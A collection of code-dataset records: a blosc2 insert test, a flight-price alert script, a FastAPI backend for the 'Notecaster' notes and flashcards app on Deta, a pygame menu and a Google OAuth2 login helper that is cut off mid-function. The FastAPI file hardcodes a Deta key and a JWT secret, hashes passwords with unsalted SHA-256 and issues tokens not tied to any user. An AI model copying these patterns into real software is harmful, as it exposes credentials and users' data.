pos * numpy.arange(200 * 1000, dtype=\"int32\")\n if create_chunk:\n chunk = blosc2.compress2(buffer)\n schunk.insert_chunk(pos, chunk)\n else:\n schunk.insert_data(pos, buffer, copy)\n chunk_ = schunk.decompress_chunk(pos)\n bytes_obj = buffer.tobytes()\n assert chunk_ == bytes_obj\n\n dest = numpy.empty(buffer.shape, buffer.dtype)\n schunk.decompress_chunk(pos, dest)\n assert numpy.array_equal(buffer, dest)\n\n for i in range(nchunks + ninserts):\n schunk.decompress_chunk(i)\n\n blosc2.remove_urlpath(urlpath)\n\n\n@pytest.mark.parametrize(\"contiguous\", [True, False])\n@pytest.mark.parametrize(\"urlpath\", [None, \"b2frame\"])\n@pytest.mark.parametrize(\n \"nchunks, ninserts\",\n [\n (0, 3),\n (1, 1),\n (10, 3),\n (15, 17),\n ],\n)\n@pytest.mark.parametrize(\"copy\", [True, False])\n@pytest.mark.parametrize(\"create_chunk\", [True, False])\ndef test_insert(contiguous, urlpath, nchunks, ninserts, copy, create_chunk):\n storage = {\n \"contiguous\": contiguous,\n \"urlpath\": urlpath,\n \"cparams\": {\"nthreads\": 2, \"typesize\": 1},\n \"dparams\": {\"nthreads\": 2},\n }\n\n blosc2.remove_urlpath(urlpath)\n nbytes = 23401\n\n schunk = blosc2.SChunk(chunksize=nbytes * 2, **storage)\n for i in range(nchunks):\n bytes_obj = b\"i \" * nbytes\n nchunks_ = schunk.append_data(bytes_obj)\n assert nchunks_ == (i + 1)\n\n for i in range(ninserts):\n pos = random.randint(0, nchunks + i)\n bytes_obj = b\"i \" * nbytes\n if create_chunk:\n chunk = blosc2.compress2(bytes_obj, **storage[\"cparams\"])\n schunk.insert_chunk(pos, chunk)\n else:\n schunk.insert_data(pos, bytes_obj, copy)\n res = schunk.decompress_chunk(pos)\n assert res == bytes_obj\n\n for i in range(nchunks + ninserts):\n schunk.decompress_chunk(i)\n\n blosc2.remove_urlpath(urlpath)\n","sub_path":"tests/test_schunk_insert.py","file_name":"test_schunk_insert.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"580629300","text":"from data_manager import DataManager\r\nfrom datetime import datetime, timedelta\r\nfrom flight_search import FlightSearch\r\nfrom notification_manager import NotificationManager\r\n\r\ndata_manager = DataManager()\r\nsheet_data = data_manager.get_destination_data()\r\nflight_search = FlightSearch()\r\nnotification_manager = NotificationManager()\r\n# print(sheet_data)\r\n\r\nORIGIN_CITY_IATA = \"LON\"\r\n#Check IATACODE in database by using Flight_Search.\r\n\r\nif 
sheet_data[0][\"iataCode\"] == \"\":\r\n from flight_search import FlightSearch\r\n flight_search = FlightSearch()\r\n for row in sheet_data:\r\n row[\"iataCode\"] = flight_search.get_destination_code(row[\"city\"])\r\n print(f\"sheet_data:\\n{sheet_data}\")\r\n\r\n data_manager.destination_data = sheet_data\r\n data_manager.update_destination_code()\r\n\r\n\r\ntomorrow = datetime.now() + timedelta(days=1)\r\nsix_month_from_today = datetime.now() + timedelta(days=(6*30))\r\n\r\nfor destination in sheet_data:\r\n flight = flight_search.check_flights(\r\n ORIGIN_CITY_IATA,\r\n destination[\"iataCode\"],\r\n from_time=tomorrow,\r\n to_time=six_month_from_today\r\n )\r\n # print(flight.price)\r\n try:\r\n if flight.price < destination[\"lowestPrice\"]:\r\n notification_manager.send_email(\r\n message=f\"Low price alert! Only {flight.price} to fly from {flight.origin_city}-{flight.origin_airport} \"\r\n f\"to {flight.destination_city}-{flight.destination_airport}, from {flight.out_date} to \"\r\n f\"{flight.return_date}.\"\r\n )\r\n except (TypeError, AttributeError):\r\n continue\r\n\r\n\r\n","sub_path":"API Flight/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"573316932","text":"from fastapi import FastAPI, File, UploadFile, Response, Header\nfrom fastapi.responses import FileResponse\nfrom typing import Optional\nfrom deta import Deta\nfrom pydantic import BaseModel\nimport hashlib\nimport jwt\nimport uuid\nimport json\nfrom datetime import datetime, timedelta\nfrom fastapi import File, UploadFile\nfrom fastapi.responses import HTMLResponse, StreamingResponse\nfrom fastapi.middleware.cors import CORSMiddleware\n\n# pydantic to declare body of put or post\napp = FastAPI()\na = \"c02ff9ee_aRR2Gi3m4xe76\"\ndeta = Deta(a+\"F8txNbk77WqghL4nKKs\")\n\norigins = [\"*\"]\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\ndef validateToken(token):\n try:\n validation = jwt.decode(token, 'UnaiSimon', algorithms=\"HS256\")\n return True\n except:\n return False\n\n\n@app.get(\"/\")\ndef read_root():\n return {\"message\": \"Let's get Started\"}\n\nclass User(BaseModel):\n fName: str\n lName: str\n username: str\n email: str\n password: str\n\n@app.post(\"/api/signup\")\ndef signup(user: User):\n \n userdb = deta.Base(\"Notecaster_User\")\n \n #hash the password\n user.password = hashlib.sha256(user.password.encode()).hexdigest()\n \n createUser = {\n \"fName\": user.fName,\n \"lName\": user.lName,\n \"username\": user.username,\n \"email\": user.email,\n \"password\": user.password\n }\n \n try:\n newuser = userdb.insert(createUser, user.username)\n except:\n return({\n \"status\": 409,\n \"message\": \"User already exists.\"\n })\n \n JWT_SECRET = 'UnaiSimon'\n JWT_ALGORITHM = 'HS256'\n JWT_EXP_DELTA_SECONDS = 2628000\n payload = {'exp': datetime.utcnow() + timedelta(seconds=JWT_EXP_DELTA_SECONDS)} \n jwt_token = jwt.encode(payload, JWT_SECRET, JWT_ALGORITHM)\n \n return({\n \"status\": 201,\n \"message\": \"User created successfully.\",\n \"token\": jwt_token,\n \"key\": user.username,\n \"fName\": user.fName,\n \"lName\": user.lName,\n \"username\": user.username,\n \"email\": user.email,\n })\n \n \nclass Login(BaseModel):\n username: str\n password: str\n \n@app.post(\"/api/login\")\ndef loginUser(login: Login):\n username = login.username\n password = login.password\n 
hashedPassword = hashlib.sha256(login.password.encode()).hexdigest()\n userdb = deta.Base(\"Notecaster_User\")\n \n #check if username exists\n theUser = next(userdb.fetch({\"username\": username}))\n if len(theUser) == 0:\n return({\n \"status\": 404,\n \"message\": \"Username does not exist.\"\n })\n \n theUser = theUser[0]\n \n #check password\n if theUser['password'] != hashedPassword:\n return({\n \"status\": 403,\n \"message\": \"Password does not match.\"\n })\n \n #generate token\n JWT_SECRET = 'UnaiSimon'\n JWT_ALGORITHM = 'HS256'\n JWT_EXP_DELTA_SECONDS = 2628000\n payload = {'exp': datetime.utcnow() + timedelta(seconds=JWT_EXP_DELTA_SECONDS)} \n jwt_token = jwt.encode(payload, JWT_SECRET, JWT_ALGORITHM)\n \n return({\n \"status\": 200,\n \"message\": \"Successfully Logged In.\",\n \"token\": jwt_token,\n \"fName\": theUser['fName'],\n \"lName\": theUser['lName'],\n \"username\": theUser['username'],\n \"email\": theUser['email'],\n })\n \nclass Subject(BaseModel):\n username: str\n name: str\n about: str\n\n@app.post(\"/api/subjects\")\ndef createproject(subject: Subject, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n name = subject.name\n about = subject.about\n username = subject.username\n \n subjectdb = deta.Base(\"Notecaster_Subject\")\n \n createSubject = {\n \"username\": username,\n \"name\": name,\n \"about\": about\n }\n \n try:\n newSubject = subjectdb.insert(createSubject)\n return newSubject\n \n except:\n return({\n \"status\": 500,\n \"message\": \"Some Error Occurred.\"\n })\n \n@app.get(\"/api/subjects/{username}\")\ndef getprojects(username: str, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n subjectdb = deta.Base(\"Notecaster_Subject\")\n allSubjects = next(subjectdb.fetch({\"username\": username}))\n return allSubjects\n\n@app.get(\"/api/subject/{key}\")\ndef getproject(key: str, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n try:\n subjectdb = deta.Base(\"Notecaster_Subject\")\n theSubject = subjectdb.get(key)\n return theSubject\n \n except:\n return({\n \"status\": 404,\n \"message\": \"Project Does not Exist\"\n })\n\n@app.put(\"/api/subject/{key}\")\ndef updateproject(key: str, subject: Subject, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n try:\n subjectdb = deta.Base(\"Notecaster_Subject\")\n theSubject = subjectdb.get(key)\n theSubject['name'] = subject.name\n theSubject['about'] = subject.about\n theSubject = subjectdb.put(theSubject)\n return theSubject\n \n except:\n return({\n \"status\": 404,\n \"message\": \"Project Does not Exist\"\n })\n\n@app.delete(\"/api/subject/{key}\")\ndef getproject(key: str, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n try:\n subjectdb = deta.Base(\"Notecaster_Subject\")\n subjectdb.delete(key)\n return ({\n \"status\": 203,\n \"message\": \"Deleted Successfully.\"\n })\n \n except:\n return({\n \"status\": 404,\n \"message\": \"Project Does not Exist\"\n })\n\n@app.put(\"/api/subjectimage/{key}\")\ndef updateImage(key: str = \"\", file: 
UploadFile = File(...), Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n subjectDrive = deta.Drive(\"Notecaster_Subject\")\n \n fileName = str(uuid.uuid4())\n fileExtension = file.filename.split(\".\")[1]\n fileName += \".\"+fileExtension\n \n subjectDrive.put(name=fileName, data=file.file, content_type=\"image/\"+fileExtension)\n\n #update image location in db\n subjectdb = deta.Base(\"Notecaster_Subject\")\n theSubject = subjectdb.get(key)\n theSubject['image'] = fileName\n theSubject = subjectdb.put(theSubject)\n theSubject['status'] = 200\n return theSubject\n\n@app.put(\"/api/removesubjectimage/{key}\")\ndef deleteImage(key: str = \"\", file: UploadFile = File(...), Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n subjectDrive = deta.Drive(\"Notecaster_Subject\")\n subjectdb = deta.Base(\"Notecaster_Subject\")\n theSubject = subjectdb.get(key)\n \n thatImage = theSubject['image']\n deleted_file = subjectDrive.delete(thatImage)\n \n del theSubject['image']\n \n theSubject = subjectdb.put(theSubject)\n return theSubject\n\n@app.get(\"/api/getsubjectimage/{key}\")\ndef getImage(key: str = \"\", Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n subjectDrive = deta.Drive(\"Notecaster_Subject\")\n subjectdb = deta.Base(\"Notecaster_Subject\")\n theSubject = subjectdb.get(key)\n \n try:\n imageFile = subjectDrive.get(theSubject['image'])\n imageExtension = theSubject['image'].split(\".\")[1]\n return StreamingResponse(imageFile.iter_chunks(1024), media_type=\"image/\"+imageExtension)\n except:\n return({\n \"status\": 404,\n \"message\": \"Image Does not Exist\"\n })\n \n \n@app.post(\"/api/uploadimage\")\ndef uploadImage(file: UploadFile = File(...), Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n subjectDrive = deta.Drive(\"Notecaster_Image\")\n \n fileName = str(uuid.uuid4())\n fileExtension = file.filename.split(\".\")[1]\n fileName += \".\"+fileExtension\n \n subjectDrive.put(name=fileName, data=file.file, content_type=\"image/\"+fileExtension)\n \n return {\n \"status\": 200,\n \"link\": \"https://notecaster-backend.deta.dev/getimage/\"+fileName\n }\n \n@app.get(\"/api/getimage/{imageLocation}\")\ndef getImage(imageLocation: str, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n subjectDrive = deta.Drive(\"Notecaster_Image\")\n try:\n imageFile = subjectDrive.get(imageLocation)\n imageExtension = imageLocation.split(\".\")[1]\n return StreamingResponse(imageFile.iter_chunks(1024), media_type=\"image/\"+imageExtension)\n except:\n return({\n \"status\": 404,\n \"message\": \"Image Does not Exist\"\n })\n \n\n#APIs for Notes\n\n#create a note for project\nclass Note(BaseModel):\n name: str\n about: str\n subject: str\n username: str\n\n@app.post(\"/api/notes\")\ndef createproject(note: Note, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n notedb = deta.Base(\"Notecaster_Note\")\n \n noter = {\n \"name\": 
note.name,\n \"about\": note.about,\n \"subject\": note.subject,\n \"username\": note.username\n }\n \n try:\n newNote = notedb.insert(noter)\n return newNote\n except:\n return({\n \"status\": 500,\n \"message\": \"Some Error Occurred.\"\n })\n \nclass UpdateNote(BaseModel):\n name: str\n about: str\n \n@app.put(\"/api/note/{key}\")\ndef createproject(key: str, updatenote: UpdateNote, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n notedb = deta.Base(\"Notecaster_Note\")\n \n try:\n theNote = notedb.get(key)\n theNote['name'] = updatenote.name\n theNote['about'] = updatenote.about\n theNote = notedb.put(theNote)\n return theNote\n except:\n return({\n \"status\": 404,\n \"message\": \"Note Does not Exist\"\n })\n \n@app.get(\"/api/notes/{subjectID}\")\ndef getnotes(subjectID: str, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n notedb = deta.Base(\"Notecaster_Note\")\n allNotes = next(notedb.fetch({\"subject\": subjectID}))\n return allNotes\n\n@app.delete(\"/api/note/{key}\")\ndef getproject(key: str, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n try:\n notedb = deta.Base(\"Notecaster_Note\")\n notedb.delete(key)\n return ({\n \"status\": 203,\n \"message\": \"Deleted Successfully.\"\n })\n \n except:\n return({\n \"status\": 404,\n \"message\": \"Note Does not Exist\"\n })\n \n@app.get(\"/api/note/{key}\")\ndef getnote(key: str, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n try:\n notedb = deta.Base(\"Notecaster_Note\")\n theNote = notedb.get(key)\n if theNote is None:\n return({\n \"status\": 404,\n \"message\": \"Note Does not Exist\"\n })\n return theNote\n \n except:\n return({\n \"status\": 404,\n \"message\": \"Note Does not Exist\"\n })\n \nclass UpdateNoteDoc(BaseModel):\n content: str \n \n@app.put(\"/api/updatenotedoc/{noteKey}\")\ndef updateNoteDoc(noteKey: str, docData: UpdateNoteDoc, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n notedb = deta.Base(\"Notecaster_Note\")\n theNote = notedb.get(noteKey)\n if theNote is None:\n return({\n \"status\": 404,\n \"message\": \"Note Does not Exist\"\n })\n theNote['content'] = docData.content\n theNote = notedb.put(theNote)\n return theNote\n\n\n#Flashcards APIs\n\nclass TypeOneCard(BaseModel):\n noteText: str\n imageLink: str\n subject: str\n \nclass TypeTwoCard(BaseModel):\n question: str\n questionImageLink: str\n answer: str\n answerImageLink: str\n subject: str\n\n@app.post(\"/api/flashcards/type1\")\ndef createCardOne(card: TypeOneCard, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n noteText = card.noteText\n imageLink = card.imageLink\n subject = card.subject\n \n carddb = deta.Base(\"Notecaster_Card\")\n \n createCard = {\n \"type\": 1,\n \"noteText\": noteText,\n \"imageLink\": imageLink,\n \"subject\": subject\n }\n \n try:\n newCard = carddb.insert(createCard)\n return newCard\n \n except:\n return({\n \"status\": 500,\n 
\"message\": \"Some Error Occurred.\"\n })\n \n@app.post(\"/api/flashcards/type2\")\ndef createCardTwo(card: TypeTwoCard, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n question = card.question\n questionImageLink = card.questionImageLink\n answer = card.answer\n answerImageLink = card.answerImageLink\n subject = card.subject\n \n carddb = deta.Base(\"Notecaster_Card\")\n \n createCard = {\n \"type\": 2,\n \"question\": question,\n \"questionImageLink\": questionImageLink,\n \"answer\": answer,\n \"answerImageLink\": answerImageLink,\n \"subject\": subject\n }\n \n try:\n newCard = carddb.insert(createCard)\n return newCard\n \n except:\n return({\n \"status\": 500,\n \"message\": \"Some Error Occurred.\"\n })\n \n@app.get(\"/api/flashcards/{subjectID}\")\ndef getCards(subjectID: str, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n carddb = deta.Base(\"Notecaster_Card\")\n allCards = next(carddb.fetch({\"subject\": subjectID}))\n return allCards\n\n@app.get(\"/api/flashcard/{key}\")\ndef getCard(key: str, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n carddb = deta.Base(\"Notecaster_Card\")\n theCard = carddb.get(key)\n if theCard is None:\n return({\n \"status\": 404,\n \"message\": \"Card Does not Exist\"\n })\n return theCard\n\n@app.delete(\"/api/flashcard/{key}\")\ndef deleteCard(key: str, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n try:\n carddb = deta.Base(\"Notecaster_Card\")\n carddb.delete(key)\n return ({\n \"status\": 203,\n \"message\": \"Deleted Successfully.\"\n })\n except:\n return({\n \"status\": 404,\n \"message\": \"Card Does not Exist\"\n })\n\nclass UpdateTypeOneCard(BaseModel):\n noteText: str\n imageLink: str\n\n@app.put(\"/api/flashcard/type1/{key}\")\ndef updateCardOne(key: str, card: UpdateTypeOneCard, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n try:\n carddb = deta.Base(\"Notecaster_Card\")\n theCard = carddb.get(key)\n theCard['noteText'] = card.noteText\n theCard['imageLink'] = card.imageLink\n theCard = carddb.put(theCard)\n return theCard\n \n except:\n return({\n \"status\": 404,\n \"message\": \"Card Does not Exist\"\n })\n \nclass UpdateTypeTwoCard(BaseModel):\n question: str\n questionImageLink: str\n answer: str\n answerImageLink: str\n \n@app.put(\"/api/flashcard/type2/{key}\")\ndef updateCardTwo(key: str, card: UpdateTypeTwoCard, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n try:\n carddb = deta.Base(\"Notecaster_Card\")\n theCard = carddb.get(key)\n theCard['question'] = card.question\n theCard['questionImageLink'] = card.questionImageLink\n theCard['answer'] = card.answer\n theCard['answerImageLink'] = card.answerImageLink\n theCard = carddb.put(theCard)\n return theCard\n \n except:\n return({\n \"status\": 404,\n \"message\": \"Card Does not Exist\"\n })\n \n\n#Sticky Notes\n#unlimited sticky notes w.r.t. 
subject\n\nclass StickyNote(BaseModel):\n    username: str\n    subjectID: str\n    data: str\n    imageLink: str\n    backgroundColor: str\n    imageColor: str\n\n@app.post(\"/api/stickynotes\")\ndef createStickyNote(stickyNote: StickyNote, Authorization: Optional[str] = Header(None)):\n    \n    if validateToken(Authorization) is False:\n        return {\n            \"status\": 401,\n            \"message\": \"Invalid Token\"\n        }\n    \n    username = stickyNote.username\n    subjectID = stickyNote.subjectID\n    data = stickyNote.data\n    imageLink = stickyNote.imageLink\n    backgroundColor = stickyNote.backgroundColor\n    imageColor = stickyNote.imageColor\n    \n    stickynotedb = deta.Base(\"Notecaster_StickyNote\")\n    \n    stickyNoteData = {\n        \"username\": username,\n        \"subjectID\": subjectID,\n        \"data\": data,\n        \"imageLink\": imageLink,\n        \"backgroundColor\": backgroundColor,\n        \"imageColor\": imageColor\n    }\n    \n    try:\n        newStickyNote = stickynotedb.insert(stickyNoteData)\n        return newStickyNote\n    \n    except:\n        return({\n            \"status\": 500,\n            \"message\": \"Some Error Occurred.\"\n        })\n    \n@app.get(\"/api/stickynotes/{subjectID}\")\ndef getStickyNotes(subjectID: str, Authorization: Optional[str] = Header(None)):\n    \n    if validateToken(Authorization) is False:\n        return {\n            \"status\": 401,\n            \"message\": \"Invalid Token\"\n        }\n    \n    stickynotedb = deta.Base(\"Notecaster_StickyNote\")\n    allStickyNotes = next(stickynotedb.fetch({\"subjectID\": subjectID}))\n    return allStickyNotes\n\n@app.get(\"/api/stickynote/{key}\")\ndef getStickyNote(key: str, Authorization: Optional[str] = Header(None)):\n    \n    if validateToken(Authorization) is False:\n        return {\n            \"status\": 401,\n            \"message\": \"Invalid Token\"\n        }\n    \n    stickynotedb = deta.Base(\"Notecaster_StickyNote\")\n    theStickyNote = stickynotedb.get(key)\n    if theStickyNote is None:\n        return({\n            \"status\": 404,\n            \"message\": \"Sticky Note Does not Exist\"\n        })\n    return theStickyNote\n\n@app.delete(\"/api/stickynote/{key}\")\ndef deleteStickyNote(key: str, Authorization: Optional[str] = Header(None)):\n    \n    if validateToken(Authorization) is False:\n        return {\n            \"status\": 401,\n            \"message\": \"Invalid Token\"\n        }\n    \n    try:\n        stickynotedb = deta.Base(\"Notecaster_StickyNote\")\n        stickynotedb.delete(key)\n        return ({\n            \"status\": 203,\n            \"message\": \"Deleted Successfully.\"\n        })\n    except:\n        return({\n            \"status\": 404,\n            \"message\": \"Sticky Note Does not Exist\"\n        })\n    \nclass UpdateStickyNote(BaseModel):\n    data: str\n    imageLink: str\n    backgroundColor: str\n    imageColor: str\n    \n@app.put(\"/api/stickynote/{key}\")\ndef updateStickyNote(key: str, stickyNote: UpdateStickyNote, Authorization: Optional[str] = Header(None)):\n    \n    if validateToken(Authorization) is False:\n        return {\n            \"status\": 401,\n            \"message\": \"Invalid Token\"\n        }\n    \n    try:\n        stickynotedb = deta.Base(\"Notecaster_StickyNote\")\n        theStickyNote = stickynotedb.get(key)\n        theStickyNote['data'] = stickyNote.data\n        theStickyNote['imageLink'] = stickyNote.imageLink\n        theStickyNote['backgroundColor'] = stickyNote.backgroundColor\n        theStickyNote['imageColor'] = stickyNote.imageColor\n        theStickyNote = stickynotedb.put(theStickyNote)\n        return theStickyNote\n    \n    except:\n        return({\n            \"status\": 404,\n            \"message\": \"Sticky Note Does not Exist\"\n        })","sub_path":"notecaster/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":22195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"648290840","text":"import pygame\nfrom const import *\nfrom pygame.sprite import Sprite\nfrom buttons import ButtonMenu, 
ButtonsSettings\n\nclass Menu(object):\n    complexity_types = ['EASY', 'MEDIUM', 'HARD']\n    game_types = ['PvP', 'PvE']\n    def __init__(self, screen):\n        \"\"\"\n        This class initializes all the buttons located in the menu\n        \"\"\"\n        self.screen = screen\n        self.screen_rect = self.screen.get_rect()\n        self.background = pygame.image.load(\"img/bg_menu.png\")\n        self.font_title = pygame.font.SysFont(\"comicsansms\", 96)\n        self.text_color = BLACK\n        self.title = self.font_title.render(\"Sea Battle\", True, self.text_color, None)\n        self.title_rect = self.title.get_rect()\n        self.title_rect.center = self.screen_rect.center\n        self.title_rect.top-=100\n        self.button_play = ButtonMenu(self.screen, 'PLAY', 0)\n        self.button_set = ButtonMenu(self.screen, 'SETTINGS', 1)\n        self.button_comp_i = 0\n        self.button_gt_i = 0\n        self.game_type = self.game_types[self.button_gt_i]\n        self.complexity = self.complexity_types[self.button_comp_i]\n        self.font_settings = pygame.font.SysFont(None, 50)\n        self.print_game_type = self.font_settings.render(self.game_type, True, self.text_color, None)\n        self.print_complexity = self.font_settings.render(self.complexity, True, self.text_color, None)\n        self.print_game_type_rect = self.print_game_type.get_rect()\n        self.print_complexity_rect = self.print_complexity.get_rect()\n        self.print_complexity_rect.center = self.print_game_type_rect.center = self.screen_rect.center\n        self.print_complexity_rect.top += 60\n        self.button_next_comp = ButtonsSettings(self.screen, 1, 1)\n        self.button_back_comp = ButtonsSettings(self.screen, -1, 1)\n        self.button_next_gt = ButtonsSettings(self.screen, 1, 0)\n        self.button_back_gt = ButtonsSettings(self.screen, -1, 0)\n        self.button_back = ButtonMenu(screen,'BACK', 2)\n        self.button_restart = ButtonMenu(screen, 'LEAVE THE GAME', 2)\n\n\n\n    def draw_menu(self):\n        \"\"\"\n        This function draws the menu\n        \"\"\"\n        self.screen.blit(self.background, (0, 0))\n        self.screen.blit(self.title, self.title_rect)\n        self.button_play.draw_button()\n        self.button_set.draw_button()\n    def draw_settings(self):\n        \"\"\"\n        This function draws the settings window\n        :return:\n        \"\"\"\n        self.screen.blit(self.background, (0, 0))\n        self.screen.blit(self.title, self.title_rect)\n        self.screen.blit(self.print_game_type, self.print_game_type_rect)\n        self.screen.blit(self.print_complexity, self.print_complexity_rect)\n        self.button_next_comp.draw()\n        self.button_back_comp.draw()\n        self.button_next_gt.draw()\n        self.button_back_gt.draw()\n        self.button_back.draw_button()\n\n\n\n\n\n","sub_path":"PycharmProjects/BattleShip2.0/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"21035161","text":"from amh import base, settings, models\nfrom ancoris import gapi\nfrom ancoris.gae import util\nimport logging\n\n\nclass GoogleOAuth2():\n    def __init__(self, request, code=None, redirect_uri=None, mobile=False):\n        self._code = code\n        self._redirect_uri = redirect_uri\n        self._mobile = mobile\n        self._request = request\n        self._request_obj = request.request\n\n    def run(self):\n        if self._mobile:\n            cid = settings.OAUTH2_LWS_CLIENT_ID\n            csk = settings.OAUTH2_LWS_CLIENT_SECRET\n        else:\n            logging.info('running this function')\n            cid = settings.OAUTH2_CLIENT_ID\n            csk = settings.OAUTH2_CLIENT_SECRET\n\n        logging.info([cid, csk])\n        flow = base.get_flow(self._request_obj, redirect_uri=self._redirect_uri, cid=cid, csk=csk)\n\n        login_service = gapi.GooglePlusLoginService(flow, self._code)\n        user_info, creds = 
login_service.get_user_info()\n\n return self.complete_login(user_info, creds)\n\n def complete_login(self, user_info, creds):\n domain = user_info.get('domain', None)\n email = self.get_email(user_info)\n google_id = user_info['id']\n first_name, last_name = self.get_user_name(user_info)\n\n# if not domain:\n# # no domain means they are not google apps\n\n# # models.LoginLog.log_failure(enums.LoginType.GoogleApps,\n# # email,\n# # ip_address=self._request_obj.remote_addr,\n# # failure_reason=enums.LoginFailureReason.NotGappsDomain)\n# self._request.add_message('Error logging in. Not a valid Google Apps account.', 'danger')\n# self._request.redirect_to('login')\n# return\n# elif domain not in settings.ALLOWED_DOMAINS:\n# # models.LoginLog.log_failure(enums.LoginType.GoogleApps,\n# # email,\n# # ip_address=self._request_obj.remote_addr,\n# # failure_reason=enums.LoginFailureReason.ServerRestriction)\n# self._request.add_message('Error logging in. Not a valid Google Apps domain.', 'danger')\n# self._request.redirect_to('login')\n# return\n\n # this code needs to combine 'login' and 'register and verify' in one hit\n # pseudo code:\n # 1. get user by gapps id\n # 2. if user not found, try to find by email instead, as the user may have previously logged in via password and not sso\n # 3. if user found, log in. make sure google_id, name and email are correct\n # 4. if user not found, then we need to register them, and then subsequently log them in\n\n user = models.User.get_by_google_id(google_id)\n if not user:\n user = models.User.get_by_auth_id(email)\n\n updated = False\n if user:\n if first_name and user.first_name != first_name:\n user.first_name = first_name\n updated = True\n\n if last_name and user.last_name != last_name:\n user.last_name = last_name\n updated = True\n\n if google_id and user.google_id != google_id:\n user.google_id = google_id\n updated = True\n\n if user.email != email:\n success, _ = user.replace_auth_id(email)\n if success:\n updated = True\n\n if not user.verified:\n # no need to verify now - we know who they are as they just logged in\n user.verified = True\n updated = True\n else:\n # new user - need to register them ...\n if not self.validate(email):\n return\n\n # register the user ...\n ip_address = self._request_obj.remote_addr\n user = models.User.register(email, first_name=first_name, last_name=last_name, google_id=google_id, ip_address=ip_address)\n updated = True\n\n if updated:\n user.put()\n\n # log the user in ...\n picture = self.get_profile_picture(user_info)\n user.avatar = picture\n self.login(user)\n return creds\n\n def validate(self, email):\n # check the email address isn't already registered ...\n user = models.User.by_email(email)\n if user:\n self._request.add_message('That email address is not available.', 'danger')\n self._request.redirect_to('login')\n return False\n return True\n\n def get_email(self, user_info):\n for email in user_info['emails']:\n if email['type'] == 'account':\n return email['value']\n\n def get_profile_picture(self, user_info):\n avatar = None\n if 'image' in user_info:\n image = user_info['image']\n avatar = image.get('url')\n return avatar\n\n def get_user_name(self, user_info):\n \"\"\" gets the users first and last name from the user_info dictionary \"\"\"\n\n first_name = None\n last_name = None\n\n if 'name' in user_info:\n name = user_info['name']\n first_name = name.get('givenName')\n last_name = name.get('familyName')\n elif 'displayName' in user_info:\n # potential bug here - is displayName like a pseudo 
